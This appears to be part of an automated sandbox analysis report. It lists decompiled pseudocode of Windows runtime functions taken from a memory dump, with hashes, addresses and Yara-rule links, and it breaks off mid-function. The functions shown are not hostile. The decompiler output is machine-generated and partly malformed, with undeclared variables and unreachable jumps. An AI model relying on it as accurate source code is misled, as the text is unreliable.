Instruction Fuzzy Hash: D8F0C8372016229FD332EE555884B27A6F6AFC1A60F190435F7059B268C96488029AD1

Uniqueness

Uniqueness Score: -1.00%

Function 035FB1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E035FB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E03617D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E03617D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E03677016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x035fb1e8
0x035fb1ea
0x035fb1f3
0x03654a17
0x035fb1f9
0x035fb1f9
0x035fb1f9
0x035fb201
0x03654a21
0x03654a2e
0x00000000
0x00000000
0x03654a3b
0x03654a4d
0x03654a3d
0x03654a46
0x03654a46
0x03654a55
0x00000000
0x00000000
0x00000000
0x035fb20a
0x035fb20a
0x035fb20a
0x035fb20a

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: b2a08c27ef39b86c2bdd1c4c0da7ed9d30c72d3c191843df5aeaee710dda4ad5
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 2101D136200684DFD322D75AD904F6ABB98FF81794F0C00B1FE158B6B1DAB8C840C258

Uniqueness

Uniqueness Score: -1.00%

Function 0368FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0368FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x36ed360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E03617D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0363B640(E03639AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0368fe96
0x0368fe9e
0x0368fea1
0x0368fead
0x0368feb3
0x0368feb9
0x0368fec3
0x0368fed5
0x0368fec5
0x0368fece
0x0368fece
0x0368fee0
0x0368fee1
0x0368fee3
0x0368fee8
0x0368fefb

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bfd5b7765cd35f50f13b6afb92bb4fc421a47a7dfaa2b822d895de54686c634
Instruction ID: b3303bf4d4a2658947cc60ac6eb32057f2ac7e9eb31266d29e925fe73542d32d
Opcode Fuzzy Hash: 5bfd5b7765cd35f50f13b6afb92bb4fc421a47a7dfaa2b822d895de54686c634
Instruction Fuzzy Hash: 80011274A0030CEFCB14EFA8D545A6EB7F4EF09304F144159A515DF382D675D911CB54

Uniqueness

Uniqueness Score: -1.00%

Function 036B131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E036B131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x36ed360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E03617D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0363B640(E03639AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x036b131b
0x036b132a
0x036b1330
0x036b1336
0x036b133e
0x036b1341
0x036b1344
0x036b134f
0x036b1361
0x036b1351
0x036b135a
0x036b135a
0x036b136c
0x036b136d
0x036b136f
0x036b1374
0x036b1387

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32e5dd1e31f1106b980360c20269115bc05b27ab36396412e0c2efa193129c48
Instruction ID: 07d2cffa41fbb172aa5377c5fc1fa76472fb949f081d25c68e25634a80bdc2ac
Opcode Fuzzy Hash: 32e5dd1e31f1106b980360c20269115bc05b27ab36396412e0c2efa193129c48
Instruction Fuzzy Hash: 64013C75E0520CAFCB04EFA9D555AAEB7F4FF09700F004059B805EB381E6749A50CB54

Uniqueness

Uniqueness Score: -1.00%

Function 036C8F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E036C8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x36ed360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E03617D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0363B640(E03639AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x036c8f6a
0x036c8f79
0x036c8f81
0x036c8f84
0x036c8f8b
0x036c8f91
0x036c8f94
0x036c8f9e
0x036c8fb0
0x036c8fa0
0x036c8fa9
0x036c8fa9
0x036c8fbb
0x036c8fbc
0x036c8fbe
0x036c8fc3
0x036c8fd6

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d01aa9175229739f04eac825bc914bb0829399588581ae9f20b458e84466f6d
Instruction ID: 4769d79a30a098c082fd366ea20fae56ce47fca5f6a17648cd0006d7293e1f0a
Opcode Fuzzy Hash: 7d01aa9175229739f04eac825bc914bb0829399588581ae9f20b458e84466f6d
Instruction Fuzzy Hash: F0014F74E0024CAFCB00EFA8D545AAEB7F4EF09300F104059B915EB381EA74DA10CB98

Uniqueness

Uniqueness Score: -1.00%

Function 036B1608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E036B1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x36ed360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E03617D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0363B640(E03639AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x036b1608
0x036b1617
0x036b161d
0x036b1625
0x036b1628
0x036b162b
0x036b1636
0x036b1648
0x036b1638
0x036b1641
0x036b1641
0x036b1653
0x036b1654
0x036b1656
0x036b165b
0x036b166e

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd60225c58e6ae2777f52aaef8a43ea80fe0a84454dab72ac2271383eee8ab7
Instruction ID: 86ef7e524378371db7c91b0f857ee535332aa161b824db9af3be3e9fc8dc575f
Opcode Fuzzy Hash: 4bd60225c58e6ae2777f52aaef8a43ea80fe0a84454dab72ac2271383eee8ab7
Instruction Fuzzy Hash: 92F06D75E00348EFDB04EFA8D515AAEB7F4EF09300F044069A915EB381EA749910CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0361C577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0361C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0361C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x35d11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E036C88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x0361c577
0x0361c57d
0x0361c581
0x0361c5b5
0x0361c5b9
0x0361c5ce
0x0361c5ce
0x0361c5ca
0x00000000
0x0361c5ca
0x0361c5c4
0x0361c5c8
0x00000000
0x00000000
0x00000000
0x0361c5ad
0x00000000
0x0361c5af

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53c914dafa521cb76f3c95bb2228ac7739e5031b2beb78c889dc9147d4157e24
Instruction ID: c7dcb24963eb8956d762399b82170ca326f16904a67c4c1c4311006b23af4353
Opcode Fuzzy Hash: 53c914dafa521cb76f3c95bb2228ac7739e5031b2beb78c889dc9147d4157e24
Instruction Fuzzy Hash: 18F0E2B29957909FD731C768C204B2ABFEEAB05678F4CC4ABD40687759C7A4D8B0C258

Uniqueness

Uniqueness Score: -1.00%

Function 0363927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0363927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L03614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0363FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E036392C6(_t11, _t14);
				}
				return _t11;
			}

0x03639295
0x03639299
0x0363929f
0x036392aa
0x036392ad
0x036392ae
0x036392af
0x036392b0
0x036392b4
0x036392bb
0x036392bb
0x036392c5

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 7822569a33e0b2db86fa9a9113fb1f2e907d8fbfb36022f6281c28dfde37aaae
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: C4E0E532650A006BD711DE1ACC80F0376A99F82720F04407CB5001E242CAE5D8188BA8

Uniqueness

Uniqueness Score: -1.00%

Function 036B2073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E036B2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E036AFD22(__ecx);
				_t19 =  *0x36e849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x36e8748; // 0x0
					if(__eflags <= 0) {
						E036B1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x36e8724 & 0x00000004;
							if(( *0x36e8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x36e8724; // 0x0
					return E036A8DF1(__ebx, 0xc0000374, 0x36e5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x036b2076
0x036b2078
0x036b207d
0x036b2083
0x036b20a4
0x036b20aa
0x036b20ac
0x036b20b7
0x036b20ba
0x036b20bc
0x036b20c9
0x036b20c9
0x036b20d0
0x036b20d2
0x00000000
0x036b20d2
0x036b20be
0x036b20c3
0x036b20c5
0x036b20c7
0x00000000
0x00000000
0x036b20c7
0x036b20bc
0x036b20d4
0x036b2085
0x036b2085
0x036b20a3
0x036b20a3

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07314d0f5573139117b729b9477bbb6c60b0e68689858fdebfc686ce5111dcc5
Instruction ID: 01d9fb8302aaf04c9084651eae56d436d264502fc0092c8a90984f5b2f5f5545
Opcode Fuzzy Hash: 07314d0f5573139117b729b9477bbb6c60b0e68689858fdebfc686ce5111dcc5
Instruction Fuzzy Hash: C3F0A07B4166A98ADF32FB2867252E67BE4DB86550F0D28C9D8901F308C53988C7DF25

Uniqueness

Uniqueness Score: -1.00%

Function 036C8D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E036C8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x36ed360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E03617D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0363B640(E03639AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x036c8d34
0x036c8d43
0x036c8d4b
0x036c8d4e
0x036c8d52
0x036c8d5c
0x036c8d6e
0x036c8d5e
0x036c8d67
0x036c8d67
0x036c8d79
0x036c8d7a
0x036c8d7c
0x036c8d81
0x036c8d94

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b0758c8d3db4963936c7405301639d7bb8d54d34c86f4e630cfd06582190841
Instruction ID: c3c92783aa24c1cce3ffbbc8e9bccb7d784456693174da08a4069da5020c59b2
Opcode Fuzzy Hash: 7b0758c8d3db4963936c7405301639d7bb8d54d34c86f4e630cfd06582190841
Instruction Fuzzy Hash: 54F09A74E14748AFCB14EBA8D551A6EB7B4EB08300F108099E905EB281EA34E9008B58

Uniqueness

Uniqueness Score: -1.00%

Function 036C8B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E036C8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x36ed360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E03617D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0363B640(E03639AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x036c8b67
0x036c8b6f
0x036c8b72
0x036c8b7d
0x036c8b8f
0x036c8b7f
0x036c8b88
0x036c8b88
0x036c8b9a
0x036c8b9b
0x036c8b9d
0x036c8ba2
0x036c8bb5

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6dbf3a39db671e622a12133d24cdb8613f32c4256e27ca67c35d037637657ed
Instruction ID: d0d0f47aa383740f16b84eaa97a4e4547887f134966bd2d4d6202c1ae4832dc0
Opcode Fuzzy Hash: f6dbf3a39db671e622a12133d24cdb8613f32c4256e27ca67c35d037637657ed
Instruction Fuzzy Hash: B9F082B4A14258AFDB10EBA8D906E7EB3B4EF05300F04045DB915DF381EA74D900C798

Uniqueness

Uniqueness Score: -1.00%

Function 035F4F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E035F4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E036C88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0361C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x35d1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x035f4f2e
0x035f4f34
0x035f4f38
0x03650b85
0x03650b85
0x03650b89
0x03650b9a
0x03650b9a
0x03650b9f
0x00000000
0x03650b9f
0x03650b94
0x03650b98
0x00000000
0x00000000
0x00000000
0x03650b98
0x035f4f3e
0x035f4f48
0x00000000
0x035f4f6e
0x00000000
0x035f4f70

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b1df822b91ead130f955602725cb5b5c8ddd68d03c0c969094aeaf06114330
Instruction ID: af053fc110a0dd6ead66ee6e9a714299e9b70a61f7c76bff08908aff7382d123
Opcode Fuzzy Hash: a4b1df822b91ead130f955602725cb5b5c8ddd68d03c0c969094aeaf06114330
Instruction Fuzzy Hash: 16F0B8769226858FD770D728C290B22B7E8AF007BCF0848B8E8058BB20C725E980C680

Uniqueness

Uniqueness Score: -1.00%

Function 0361746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0361746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0360EB70(__ecx, 0x36e79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E036395D0();
							L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x0361746d
0x0361746d
0x0361746d
0x03617471
0x03617488
0x0365f92d
0x0361748e
0x03617491
0x03617495
0x0365f937
0x0365f93a
0x0365f94e
0x0365f953
0x0365f956
0x0365f956
0x03617495
0x00000000
0x03617488
0x03617473
0x03617478
0x0361747d
0x03617481
0x00000000
0x03617481
0x0361747d
0x0361747a
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c269d6bddf1cfba9a67a591f90a1a330b7b481937a7aa1d0ba5e1549487aca74
Instruction ID: 55d0bf1139219cd3594d65b9c7c84e3fd373ad33b75f586ce2c9ffde71d311f4
Opcode Fuzzy Hash: c269d6bddf1cfba9a67a591f90a1a330b7b481937a7aa1d0ba5e1549487aca74
Instruction Fuzzy Hash: 1AF02E39901644EACF01D7BCC941F7ABFB1AF04310F0C0559D8D1AF250E765D811D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 036C8CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E036C8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x36ed360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E03617D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0363B640(E03639AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x036c8ce5
0x036c8ced
0x036c8cf0
0x036c8cfb
0x036c8d0d
0x036c8cfd
0x036c8d06
0x036c8d06
0x036c8d18
0x036c8d19
0x036c8d1b
0x036c8d20
0x036c8d33

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 622a6d67a216b4a6143ac64d0e432ada745b3126e214046581ae3b3fc3022c1a
Instruction ID: 98946702cd3b956abb7378a733309dc2c16a2be860c65ed9491916da5dff04c6
Opcode Fuzzy Hash: 622a6d67a216b4a6143ac64d0e432ada745b3126e214046581ae3b3fc3022c1a
Instruction Fuzzy Hash: 69F08275A14648AFCB04EBA8E955E6E77B4EF09300F14019DE916EF381EA34E900C758

Uniqueness

Uniqueness Score: -1.00%

Function 0362A44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0362A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x36e7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L03614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0363FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0362a44b
0x0362a453
0x0362a472
0x0362a476
0x00000000
0x0362a493
0x0362a47a
0x0362a47f
0x0362a486
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0b94ba0db0c1470aee84d0ca37f924a7b36297502a87f84455b1af63be630e7
Instruction ID: 36e4382a25b4d2c9abc483c89d09d53fbd4053604bec2877e3f81f229417b136
Opcode Fuzzy Hash: d0b94ba0db0c1470aee84d0ca37f924a7b36297502a87f84455b1af63be630e7
Instruction Fuzzy Hash: FBE09272A01821ABD3129E58ED00F66B7ADDBE5A55F0A4039F504CB214DA68DD12C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 035FF358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E035FF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0362F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L03614620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x035ff35d
0x035ff361
0x035ff367
0x035ff372
0x035ff38c
0x035ff38c
0x035ff394

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 7c9fde8c94554ccb25fa3c544cb8cc451f73a02781c249f8902a6af1a186c5ef
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: F9E0D833A40218BFCB21D6D9AD05F5BBBBDEB44A60F050155BA04DB5A0D9709D10C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 0360FF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0360FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x35d11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
